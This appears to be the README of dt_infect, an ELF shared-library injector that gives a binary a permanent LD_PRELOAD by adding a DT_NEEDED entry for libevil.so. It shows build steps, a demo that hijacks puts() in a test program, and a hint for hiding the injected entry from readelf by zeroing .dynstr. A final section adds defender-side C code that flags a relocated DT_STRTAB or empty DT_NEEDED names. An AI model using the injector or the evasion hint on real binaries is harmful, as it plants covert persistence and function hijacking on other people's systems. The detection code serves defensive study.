
dt_infect v1.0

Author: ElfMaster 2/15/19 - [email protected]

ELF Shared library injector using DT_NEEDED precedence infection. Acts as a permanent LD_PRELOAD

NOTE: It does not work on PIE executables because it uses a reverse text padding infection to create room
for .dynstr. This could be replaced with a text padding infection, or a PT_NOTE to PT_LOAD conversion
infection in order to store the .dynstr; then it would be compatible with PIE executables.

# Build

```sh
git clone https://github.com/elfmaster/libelfmaster
cd libelfmaster; make; sudo make install
```

Issues: https://github.com/elfmaster/dt_infect/issues

# Example

Run `test` before it is infected:

```
$ ./test
Don't infect me please
```

Then inject libevil.so into test and hijack puts():

```
$ make
$ ./inject libevil.so test
Updating .dynstr section
Modified d_entry.value of DT_STRTAB to: 3ff040 (index: 9)
Successfully injected 'libevil.so' into target: 'test'. Make sure to move 'libevil.so' into one of the shared object search paths, i.e. /lib/x86_64-gnu-linux/
$ readelf -d test | grep NEEDED
 0x0000000000000001 (NEEDED)             Shared library: [libevil.so]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
$ ./test
D0n'7 1nf3c7 m3 pl3453
```

# Further work with obfuscation

I will give a hint, since adding this extra layer of obfuscation will make this DT_NEEDED
infection much harder to detect... but there are several pieces of software out there that can obfuscate
the dynamic string table, which will prevent the injected DT_NEEDED entry from showing up in tools like readelf. The simplest formula
is to zero out .dynstr in the target binary, and inject some constructor code that restores it
at runtime. @ulexec wrote a much better one that uses a custom runtime resolver.
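As an added defender-side check (not part of dt_infect), the C function below walks an ELF64 dynamic table and reports what the inject and readelf output in the Example section makes visible: the DT_NEEDED order (earlier entries come earlier in the dynamic linker's symbol search scope, which is why libevil.so's puts() wins over libc's) and whether DT_STRTAB still matches the address recorded in the .dynstr section header, which the injector changes when it relocates .dynstr into padding. A DT_NEEDED whose name is empty on disk also flags the zeroed-.dynstr variant described in the obfuscation section. The sample table, the 0x400318 section address and the 16-entry limit are constructed assumptions, not values from a real binary.

```c
#include <elf.h>
#include <stdint.h>
#include <string.h>

struct dyn_report {
    int strtab_relocated;  /* DT_STRTAB no longer equals the .dynstr section's sh_addr */
    int empty_needed;      /* a DT_NEEDED resolves to "" on disk (zeroed .dynstr) */
    int needed_count;
    const char *needed[16]; /* names in table order; earlier = searched earlier */
};

/* Walk an ELF64 dynamic table (PT_DYNAMIC contents) against the string table
 * that DT_STRTAB points to and the sh_addr recorded in the .dynstr header.
 * Returns 0 and fills *out, or -1 on a malformed table. */
int inspect_dynamic(const Elf64_Dyn *dyn, size_t n, uint64_t dynstr_sh_addr,
                    const char *strtab, size_t strsz, struct dyn_report *out)
{
    uint64_t strtab_addr = 0;
    memset(out, 0, sizeof *out);
    for (size_t i = 0; i < n && dyn[i].d_tag != DT_NULL; i++)
        if (dyn[i].d_tag == DT_STRTAB) strtab_addr = dyn[i].d_un.d_ptr;
    if (strtab_addr == 0) return -1;
    out->strtab_relocated = (strtab_addr != dynstr_sh_addr);
    for (size_t i = 0; i < n && dyn[i].d_tag != DT_NULL; i++) {
        if (dyn[i].d_tag != DT_NEEDED) continue;
        uint64_t off = dyn[i].d_un.d_val;
        /* The name must start inside the table and be NUL-terminated within it. */
        if (off >= strsz || out->needed_count == 16 ||
            !memchr(strtab + off, '\0', strsz - off)) return -1;
        if (strtab[off] == '\0') out->empty_needed = 1;
        out->needed[out->needed_count++] = strtab + off;
    }
    return 0;
}

/* Constructed sample mirroring the readelf output above: two DT_NEEDED
 * entries and a DT_STRTAB of 0x3ff040, while the (assumed) .dynstr section
 * header still records 0x400318. Not taken from a real binary. */
int run_sample(struct dyn_report *out)
{
    static const char strtab[] = "\0libevil.so\0libc.so.6";
    static const Elf64_Dyn dyn[] = {
        { .d_tag = DT_NEEDED, .d_un = { .d_val = 1 } },   /* "libevil.so" */
        { .d_tag = DT_NEEDED, .d_un = { .d_val = 12 } },  /* "libc.so.6"  */
        { .d_tag = DT_STRTAB, .d_un = { .d_ptr = 0x3ff040 } },
        { .d_tag = DT_NULL,   .d_un = { .d_val = 0 } },
    };
    return inspect_dynamic(dyn, 4, 0x400318, strtab, sizeof strtab, out);
}
```

On a real file, feed inspect_dynamic the bytes of the PT_DYNAMIC segment, the string table at DT_STRTAB/DT_STRSZ, and the sh_addr of the section named .dynstr; a mismatch or an empty name is a reason to look closer, not proof of infection on its own.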
